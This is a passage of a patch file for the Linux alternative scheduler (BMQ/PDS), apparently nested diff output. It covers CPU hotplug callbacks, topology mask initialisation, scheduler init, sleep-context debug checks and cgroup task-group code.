-+	 * When going up, increment the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
-+		static_branch_inc_cpuslocked(&sched_smt_present);
-+#endif
-+	set_cpu_active(cpu, true);
-+
-+	if (sched_smp_initialized)
-+		cpuset_cpu_active();
-+
-+	/*
-+	 * Put the rq online, if not already. This happens:
-+	 *
-+	 * 1) In the early boot process, because we build the real domains
-+	 *    after all cpus have been brought up.
-+	 *
-+	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
-+	 *    domains.
-+	 */
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	set_rq_online(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	return 0;
-+}
-+
-+int sched_cpu_deactivate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	int ret;
-+
-+	set_cpu_active(cpu, false);
-+
-+	/*
-+	 * From this point forward, this CPU will refuse to run any task that
-+	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
-+	 * push those tasks away until this gets cleared, see
-+	 * sched_cpu_dying().
-+	 */
-+	balance_push_set(cpu, true);
-+
-+	/*
-+	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
-+	 * users of this state to go away such that all new such users will
-+	 * observe it.
-+	 *
-+	 * Specifically, we rely on ttwu to no longer target this CPU, see
-+	 * ttwu_queue_cond() and is_cpu_allowed().
-+	 *
-+	 * Do the sync before parking the smpboot threads to take care of the
-+	 * RCU boost case.
-+	 */
-+	synchronize_rcu();
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	update_rq_clock(rq);
-+	set_rq_offline(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going down, decrement the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
-+		static_branch_dec_cpuslocked(&sched_smt_present);
-+		if (!static_branch_likely(&sched_smt_present))
-+			cpumask_clear(&sched_sg_idle_mask);
-+	}
-+#endif
-+
-+	if (!sched_smp_initialized)
-+		return 0;
-+
-+	ret = cpuset_cpu_inactive(cpu);
-+	if (ret) {
-+		balance_push_set(cpu, false);
-+		set_cpu_active(cpu, true);
-+		return ret;
-+	}
-+
-+	return 0;
-+}
-+
-+static void sched_rq_cpu_starting(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	rq->calc_load_update = calc_load_update;
-+}
-+
-+int sched_cpu_starting(unsigned int cpu)
-+{
-+	sched_rq_cpu_starting(cpu);
-+	sched_tick_start(cpu);
-+	return 0;
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+
-+/*
-+ * Invoked immediately before the stopper thread is invoked to bring the
-+ * CPU down completely. At this point all per CPU kthreads except the
-+ * hotplug thread (current) and the stopper thread (inactive) have been
-+ * either parked or have been unbound from the outgoing CPU. Ensure that
-+ * any of those which might be on the way out are gone.
-+ *
-+ * If after this point a bound task is being woken on this CPU then the
-+ * responsible hotplug callback has failed to do its job.
-+ * sched_cpu_dying() will catch it with the appropriate fireworks.
-+ */
-+int sched_cpu_wait_empty(unsigned int cpu)
-+{
-+	balance_hotplug_wait();
-+	return 0;
-+}
-+
-+/*
-+ * Since this CPU is going 'away' for a while, fold any nr_active delta we
-+ * might have. Called from the CPU stopper task after ensuring that the
-+ * stopper is the last running task on the CPU, so nr_active count is
-+ * stable. We need to take the teardown thread which is calling this into
-+ * account, so we hand in adjust = 1 to the load calculation.
-+ *
-+ * Also see the comment "Global load-average calculations".
-+ */
-+static void calc_load_migrate(struct rq *rq)
-+{
-+	long delta = calc_load_fold_active(rq, 1);
-+
-+	if (delta)
-+		atomic_long_add(delta, &calc_load_tasks);
-+}
-+
-+static void dump_rq_tasks(struct rq *rq, const char *loglvl)
-+{
-+	struct task_struct *g, *p;
-+	int cpu = cpu_of(rq);
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
-+	for_each_process_thread(g, p) {
-+		if (task_cpu(p) != cpu)
-+			continue;
-+
-+		if (!task_on_rq_queued(p))
-+			continue;
-+
-+		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
-+	}
-+}
-+
-+int sched_cpu_dying(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/* Handle pending wakeups and then migrate everything off */
-+	sched_tick_stop(cpu);
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
-+		WARN(true, "Dying CPU not properly vacated!");
-+		dump_rq_tasks(rq, KERN_WARNING);
-+	}
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	calc_load_migrate(rq);
-+	hrtick_clear(rq);
-+	return 0;
-+}
-+#endif
-+
-+#ifdef CONFIG_SMP
-+static void sched_init_topology_cpumask_early(void)
-+{
-+	int cpu;
-+	cpumask_t *tmp;
-+
-+	for_each_possible_cpu(cpu) {
-+		/* init topo masks */
-+		tmp = per_cpu(sched_cpu_topo_masks, cpu);
-+
-+		cpumask_copy(tmp, cpumask_of(cpu));
-+		tmp++;
-+		cpumask_copy(tmp, cpu_possible_mask);
-+		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
-+		/*per_cpu(sd_llc_id, cpu) = cpu;*/
-+	}
-+}
-+
-+#define TOPOLOGY_CPUMASK(name, mask, last)\
-+	if (cpumask_and(topo, topo, mask)) {					\
-+		cpumask_copy(topo, mask);					\
-+		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
-+		       cpu, (topo++)->bits[0]);					\
-+	}									\
-+	if (!last)								\
-+		cpumask_complement(topo, mask)
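-+
-+/*
-+ * For illustration (not part of the original patch): on a 4-CPU SMT2
-+ * system, for cpu#0 with sibling mask 0x3 and coregroup mask 0xf, the
-+ * chain of TOPOLOGY_CPUMASK() invocations below starts from "all CPUs
-+ * but cpu#0" (0xe), records 0x3 at the smt level (0xe & 0x3 != 0) and
-+ * continues with the complement 0xc, records 0xf at the coregroup
-+ * level, and then finds nothing new at the core and others levels, so
-+ * only two topology levels end up stored for this CPU.
-+ */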
-+
-+static void sched_init_topology_cpumask(void)
-+{
-+	int cpu;
-+	cpumask_t *topo;
-+
-+	for_each_online_cpu(cpu) {
-+		/* take chance to reset time slice for idle tasks */
-+		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
-+
-+		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+
-+		cpumask_complement(topo, cpumask_of(cpu));
-+#ifdef CONFIG_SCHED_SMT
-+		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
-+#endif
-+		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
-+		per_cpu(sched_cpu_llc_mask, cpu) = topo;
-+		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
-+
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
-+		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
-+		       cpu, per_cpu(sd_llc_id, cpu),
-+		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
-+			      per_cpu(sched_cpu_topo_masks, cpu)));
-+	}
-+}
-+#endif
-+
-+void __init sched_init_smp(void)
-+{
-+	/* Move init over to a non-isolated CPU */
-+	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
-+		BUG();
-+	current->flags &= ~PF_NO_SETAFFINITY;
-+
-+	sched_init_topology_cpumask();
-+
-+	sched_smp_initialized = true;
-+}
-+#else
-+void __init sched_init_smp(void)
-+{
-+	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
-+}
-+#endif /* CONFIG_SMP */
-+
-+int in_sched_functions(unsigned long addr)
-+{
-+	return in_lock_functions(addr) ||
-+		(addr >= (unsigned long)__sched_text_start
-+		&& addr < (unsigned long)__sched_text_end);
-+}
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+/* task group related information */
-+struct task_group {
-+	struct cgroup_subsys_state css;
-+
-+	struct rcu_head rcu;
-+	struct list_head list;
-+
-+	struct task_group *parent;
-+	struct list_head siblings;
-+	struct list_head children;
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	unsigned long		shares;
-+#endif
-+};
-+
-+/*
-+ * Default task group.
-+ * Every task in the system belongs to this group at bootup.
-+ */
-+struct task_group root_task_group;
-+LIST_HEAD(task_groups);
-+
-+/* Cacheline aligned slab cache for task_group */
-+static struct kmem_cache *task_group_cache __read_mostly;
-+#endif /* CONFIG_CGROUP_SCHED */
-+
-+void __init sched_init(void)
-+{
-+	int i;
-+	struct rq *rq;
-+
-+	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
-+
-+	wait_bit_init();
-+
-+#ifdef CONFIG_SMP
-+	for (i = 0; i < SCHED_QUEUE_BITS; i++)
-+		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+	task_group_cache = KMEM_CACHE(task_group, 0);
-+
-+	list_add(&root_task_group.list, &task_groups);
-+	INIT_LIST_HEAD(&root_task_group.children);
-+	INIT_LIST_HEAD(&root_task_group.siblings);
-+#endif /* CONFIG_CGROUP_SCHED */
-+	for_each_possible_cpu(i) {
-+		rq = cpu_rq(i);
-+
-+		sched_queue_init(&rq->queue);
-+		rq->prio = IDLE_TASK_SCHED_PRIO;
-+		rq->skip = NULL;
-+
-+		raw_spin_lock_init(&rq->lock);
-+		rq->nr_running = rq->nr_uninterruptible = 0;
-+		rq->calc_load_active = 0;
-+		rq->calc_load_update = jiffies + LOAD_FREQ;
-+#ifdef CONFIG_SMP
-+		rq->online = false;
-+		rq->cpu = i;
-+
-+#ifdef CONFIG_SCHED_SMT
-+		rq->active_balance = 0;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
-+#endif
-+		rq->balance_callback = &balance_push_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+		rcuwait_init(&rq->hotplug_wait);
-+#endif
-+#endif /* CONFIG_SMP */
-+		rq->nr_switches = 0;
-+
-+		hrtick_rq_init(rq);
-+		atomic_set(&rq->nr_iowait, 0);
-+	}
-+#ifdef CONFIG_SMP
-+	/* Set rq->online for cpu 0 */
-+	cpu_rq(0)->online = true;
-+#endif
-+	/*
-+	 * The boot idle thread does lazy MMU switching as well:
-+	 */
-+	mmgrab(&init_mm);
-+	enter_lazy_tlb(&init_mm, current);
-+
-+	/*
-+	 * The idle task doesn't need the kthread struct to function, but it
-+	 * is dressed up as a per-CPU kthread and thus needs to play the part
-+	 * if we want to avoid special-casing it in code that deals with per-CPU
-+	 * kthreads.
-+	 */
-+	WARN_ON(!set_kthread_struct(current));
-+
-+	/*
-+	 * Make us the idle thread. Technically, schedule() should not be
-+	 * called from this thread, however somewhere below it might be,
-+	 * but because we are the idle thread, we just pick up running again
-+	 * when this runqueue becomes "idle".
-+	 */
-+	init_idle(current, smp_processor_id());
-+
-+	calc_load_update = jiffies + LOAD_FREQ;
-+
-+#ifdef CONFIG_SMP
-+	idle_thread_set_boot_cpu();
-+	balance_push_set(smp_processor_id(), false);
-+
-+	sched_init_topology_cpumask_early();
-+#endif /* SMP */
-+
-+	psi_init();
-+
-+	preempt_dynamic_init();
-+}
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+
-+void __might_sleep(const char *file, int line)
-+{
-+	unsigned int state = get_current_state();
-+	/*
-+	 * Blocking primitives will set (and therefore destroy) current->state;
-+	 * since we will exit with TASK_RUNNING, make sure we enter with it,
-+	 * otherwise we will destroy state.
-+	 */
-+	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
-+			"do not call blocking ops when !TASK_RUNNING; "
-+			"state=%x set at [<%p>] %pS\n", state,
-+			(void *)current->task_state_change,
-+			(void *)current->task_state_change);
-+
-+	__might_resched(file, line, 0);
-+}
-+EXPORT_SYMBOL(__might_sleep);
-+
-+static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
-+{
-+	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
-+		return;
-+
-+	if (preempt_count() == preempt_offset)
-+		return;
-+
-+	pr_err("Preemption disabled at:");
-+	print_ip_sym(KERN_ERR, ip);
-+}
-+
-+static inline bool resched_offsets_ok(unsigned int offsets)
-+{
-+	unsigned int nested = preempt_count();
-+
-+	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
-+
-+	return nested == offsets;
-+}
-+
-+void __might_resched(const char *file, int line, unsigned int offsets)
-+{
-+	/* Ratelimiting timestamp: */
-+	static unsigned long prev_jiffy;
-+
-+	unsigned long preempt_disable_ip;
-+
-+	/* WARN_ON_ONCE() by default, no rate limit required: */
-+	rcu_sleep_check();
-+
-+	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
-+	     !is_idle_task(current) && !current->non_block_count) ||
-+	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
-+	    oops_in_progress)
-+		return;
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	/* Save this before calling printk(), since that will clobber it: */
-+	preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
-+	       file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), current->non_block_count,
-+	       current->pid, current->comm);
-+	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
-+	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
-+
-+	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
-+		pr_err("RCU nest depth: %d, expected: %u\n",
-+		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
-+	}
-+
-+	if (task_stack_end_corrupted(current))
-+		pr_emerg("Thread overran stack, or stack corrupted\n");
-+
-+	debug_show_held_locks(current);
-+	if (irqs_disabled())
-+		print_irqtrace_events(current);
-+
-+	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
-+				 preempt_disable_ip);
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL(__might_resched);
-+
-+void __cant_sleep(const char *file, int line, int preempt_offset)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > preempt_offset)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
-+	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
-+			in_atomic(), irqs_disabled(),
-+			current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_sleep);
-+
-+#ifdef CONFIG_SMP
-+void __cant_migrate(const char *file, int line)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (is_migration_disabled(current))
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > 0)
-+		return;
-+
-+	if (current->migration_flags & MDF_FORCE_ENABLED)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
-+	       current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_migrate);
-+#endif
-+#endif
-+
-+#ifdef CONFIG_MAGIC_SYSRQ
-+void normalize_rt_tasks(void)
-+{
-+	struct task_struct *g, *p;
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+	};
-+
-+	read_lock(&tasklist_lock);
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * Only normalize user tasks:
-+		 */
-+		if (p->flags & PF_KTHREAD)
-+			continue;
-+
-+		schedstat_set(p->stats.wait_start,  0);
-+		schedstat_set(p->stats.sleep_start, 0);
-+		schedstat_set(p->stats.block_start, 0);
-+
-+		if (!rt_task(p)) {
-+			/*
-+			 * Renice negative nice level userspace
-+			 * tasks back to 0:
-+			 */
-+			if (task_nice(p) < 0)
-+				set_user_nice(p, 0);
-+			continue;
-+		}
-+
-+		__sched_setscheduler(p, &attr, false, false);
-+	}
-+	read_unlock(&tasklist_lock);
-+}
-+#endif /* CONFIG_MAGIC_SYSRQ */
-+
-+#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
-+/*
-+ * These functions are only useful for the IA64 MCA handling, or kdb.
-+ *
-+ * They can only be called when the whole system has been
-+ * stopped - every CPU needs to be quiescent, and no scheduling
-+ * activity can take place. Using them for anything else would
-+ * be a serious bug, and as a result, they aren't even visible
-+ * under any other configuration.
-+ */
-+
-+/**
-+ * curr_task - return the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ *
-+ * Return: The current task for @cpu.
-+ */
-+struct task_struct *curr_task(int cpu)
-+{
-+	return cpu_curr(cpu);
-+}
-+
-+#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
-+
-+#ifdef CONFIG_IA64
-+/**
-+ * ia64_set_curr_task - set the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ * @p: the task pointer to set.
-+ *
-+ * Description: This function must only be used when non-maskable interrupts
-+ * are serviced on a separate stack.  It allows the architecture to switch the
-+ * notion of the current task on a CPU in a non-blocking manner.  This function
-+ * must be called with all CPUs synchronised and interrupts disabled; the
-+ * caller must save the original value of the current task (see
-+ * curr_task() above) and restore that value before reenabling interrupts and
-+ * re-starting the system.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ */
-+void ia64_set_curr_task(int cpu, struct task_struct *p)
-+{
-+	cpu_curr(cpu) = p;
-+}
-+
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+static void sched_free_group(struct task_group *tg)
-+{
-+	kmem_cache_free(task_group_cache, tg);
-+}
-+
-+static void sched_free_group_rcu(struct rcu_head *rhp)
-+{
-+	sched_free_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+static void sched_unregister_group(struct task_group *tg)
-+{
-+	/*
-+	 * We have to wait for yet another RCU grace period to expire, as
-+	 * print_cfs_stats() might run concurrently.
-+	 */
-+	call_rcu(&tg->rcu, sched_free_group_rcu);
-+}
-+
-+/* allocate runqueue etc for a new task group */
-+struct task_group *sched_create_group(struct task_group *parent)
-+{
-+	struct task_group *tg;
-+
-+	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
-+	if (!tg)
-+		return ERR_PTR(-ENOMEM);
-+
-+	return tg;
-+}
-+
-+void sched_online_group(struct task_group *tg, struct task_group *parent)
-+{
-+}
-+
-+/* rcu callback to free various structures associated with a task group */
-+static void sched_unregister_group_rcu(struct rcu_head *rhp)
-+{
-+	/* Now it should be safe to free those cfs_rqs: */
-+	sched_unregister_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+void sched_destroy_group(struct task_group *tg)
-+{
-+	/* Wait for possible concurrent references to cfs_rqs to complete: */
-+	call_rcu(&tg->rcu, sched_unregister_group_rcu);
-+}
-+
-+void sched_release_group(struct task_group *tg)
-+{
-+}
-+
-+static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
-+{
-+	return css ? container_of(css, struct task_group, css) : NULL;
-+}
-+
-+static struct cgroup_subsys_state *
-+cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
-+{
-+	struct task_group *parent = css_tg(parent_css);
-+	struct task_group *tg;
-+
-+	if (!parent) {
-+		/* This is early initialization for the top cgroup */
-+		return &root_task_group.css;
-+	}
-+
-+	tg = sched_create_group(parent);
-+	if (IS_ERR(tg))
-+		return ERR_PTR(-ENOMEM);
-+	return &tg->css;
-+}
-+
-+/* Expose task group only after completing cgroup initialization */
-+static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+	struct task_group *parent = css_tg(css->parent);
-+
-+	if (parent)
-+		sched_online_group(tg, parent);
-+	return 0;
-+}
-+
-+static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	sched_release_group(tg);
-+}
-+
-+static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	/*
-+	 * Relies on the RCU grace period between css_released() and this.
-+	 */
-+	sched_unregister_group(tg);
-+}
-+
-+#ifdef CONFIG_RT_GROUP_SCHED
-+static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static void cpu_cgroup_attach(struct cgroup_taskset *tset)
-+{
-+}
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+static DEFINE_MUTEX(shares_mutex);
-+
-+int sched_group_set_shares(struct task_group *tg, unsigned long shares)
-+{
-+	/*
-+	 * We can't change the weight of the root cgroup.
-+	 */
-+	if (&root_task_group == tg)
-+		return -EINVAL;
-+
-+	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
-+
-+	mutex_lock(&shares_mutex);
-+	if (tg->shares == shares)
-+		goto done;
-+
-+	tg->shares = shares;
-+done:
-+	mutex_unlock(&shares_mutex);
-+	return 0;
-+}
-+
-+static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
-+				struct cftype *cftype, u64 shareval)
-+{
-+	if (shareval > scale_load_down(ULONG_MAX))
-+		shareval = MAX_SHARES;
-+	return sched_group_set_shares(css_tg(css), scale_load(shareval));
-+}
-+
-+static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
-+			       struct cftype *cft)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	return (u64) scale_load_down(tg->shares);
-+}
-+#endif
-+
-+static struct cftype cpu_legacy_files[] = {
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	{
-+		.name = "shares",
-+		.read_u64 = cpu_shares_read_u64,
-+		.write_u64 = cpu_shares_write_u64,
-+	},
-+#endif
-+	{ }	/* Terminate */
-+};
-+
-+
-+static struct cftype cpu_files[] = {
-+	{ }	/* terminate */
-+};
-+
-+static int cpu_extra_stat_show(struct seq_file *sf,
-+			       struct cgroup_subsys_state *css)
-+{
-+	return 0;
-+}
-+
-+struct cgroup_subsys cpu_cgrp_subsys = {
-+	.css_alloc	= cpu_cgroup_css_alloc,
-+	.css_online	= cpu_cgroup_css_online,
-+	.css_released	= cpu_cgroup_css_released,
-+	.css_free	= cpu_cgroup_css_free,
-+	.css_extra_stat_show = cpu_extra_stat_show,
-+#ifdef CONFIG_RT_GROUP_SCHED
-+	.can_attach	= cpu_cgroup_can_attach,
-+#endif
-+	.attach		= cpu_cgroup_attach,
-+	.legacy_cftypes	= cpu_legacy_files,
-+	.dfl_cftypes	= cpu_files,
-+	.early_init	= true,
-+	.threaded	= true,
-+};
-+#endif	/* CONFIG_CGROUP_SCHED */
-+
-+#undef CREATE_TRACE_POINTS
-diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
-new file mode 100644
-index 000000000000..1212a031700e
---- /dev/null
-+++ b/kernel/sched/alt_debug.c
-@@ -0,0 +1,31 @@
-+/*
-+ * kernel/sched/alt_debug.c
-+ *
-+ * Print the alt scheduler debugging details
-+ *
-+ * Author: Alfred Chen
-+ * Date  : 2020
-+ */
-+#include "sched.h"
-+
-+/*
-+ * This allows printing both to /proc/sched_debug and
-+ * to the console
-+ */
-+#define SEQ_printf(m, x...)			\
-+ do {						\
-+	if (m)					\
-+		seq_printf(m, x);		\
-+	else					\
-+		pr_cont(x);			\
-+ } while (0)
-+
-+void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
-+			  struct seq_file *m)
-+{
-+	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
-+						get_nr_threads(p));
-+}
-+
-+void proc_sched_set_task(struct task_struct *p)
-+{}
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-new file mode 100644
-index 000000000000..e3b6320a397a
---- /dev/null
-+++ b/kernel/sched/alt_sched.h
-@@ -0,0 +1,667 @@
-+#ifndef ALT_SCHED_H
-+#define ALT_SCHED_H
-+
-+#include <linux/context_tracking.h>
-+#include <linux/psi.h>
-+#include <linux/stop_machine.h>
-+#include <linux/syscalls.h>
-+#include <linux/tick.h>
-+
-+#include <trace/events/power.h>
-+#include <trace/events/sched.h>
-+
-+#include "../workqueue_internal.h"
-+
-+#include "cpupri.h"
-+
-+#ifdef CONFIG_SCHED_BMQ
-+/* bits:
-+ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
-+#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
-+#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
-+#endif /* CONFIG_SCHED_PDS */
-+
-+#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
-+extern void resched_latency_warn(int cpu, u64 latency);
-+#else
-+# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
-+static inline void resched_latency_warn(int cpu, u64 latency) {}
-+#endif
-+
-+/*
-+ * Increase resolution of nice-level calculations for 64-bit architectures.
-+ * The extra resolution improves shares distribution and load balancing of
-+ * low-weight task groups (e.g. nice +19 on an autogroup), deeper taskgroup
-+ * hierarchies, especially on larger systems. This is not a user-visible change
-+ * and does not change the user-interface for setting shares/weights.
-+ *
-+ * We increase resolution only if we have enough bits to allow this increased
-+ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
-+ * are pretty high and the returns do not justify the increased costs.
-+ *
-+ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
-+ * increase coverage and consistency always enable it on 64-bit platforms.
-+ */
-+#ifdef CONFIG_64BIT
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load_down(w) \
-+({ \
-+	unsigned long __w = (w); \
-+	if (__w) \
-+		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
-+	__w; \
-+})
-+#else
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		(w)
-+# define scale_load_down(w)	(w)
-+#endif
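-+
-+/*
-+ * Worked example (a sketch, assuming the usual SCHED_FIXEDPOINT_SHIFT
-+ * of 10 on a 64-bit build):
-+ *   scale_load(1024)         == 1024 << 10 == 1048576
-+ *   scale_load_down(1048576) == max(2, 1048576 >> 10) == 1024
-+ * The round trip is exact, except that any non-zero weight is clamped
-+ * to at least 2 on the way down.
-+ */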
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
-+
-+/*
-+ * A weight of 0 or 1 can cause arithmetic problems.
-+ * The weight of a cfs_rq is the sum of the weights of the entities
-+ * queued on it, so the weight of an entity should not be too large,
-+ * and neither should the shares value of a task group.
-+ * (The default weight is 1024 - so there's no practical
-+ *  limitation from this.)
-+ */
-+#define MIN_SHARES		(1UL <<  1)
-+#define MAX_SHARES		(1UL << 18)
-+#endif
-+
-+/*
-+ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
-+ */
-+#ifdef CONFIG_SCHED_DEBUG
-+# define const_debug __read_mostly
-+#else
-+# define const_debug const
-+#endif
-+
-+/* task_struct::on_rq states: */
-+#define TASK_ON_RQ_QUEUED	1
-+#define TASK_ON_RQ_MIGRATING	2
-+
-+static inline int task_on_rq_queued(struct task_struct *p)
-+{
-+	return p->on_rq == TASK_ON_RQ_QUEUED;
-+}
-+
-+static inline int task_on_rq_migrating(struct task_struct *p)
-+{
-+	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
-+}
-+
-+/*
-+ * wake flags
-+ */
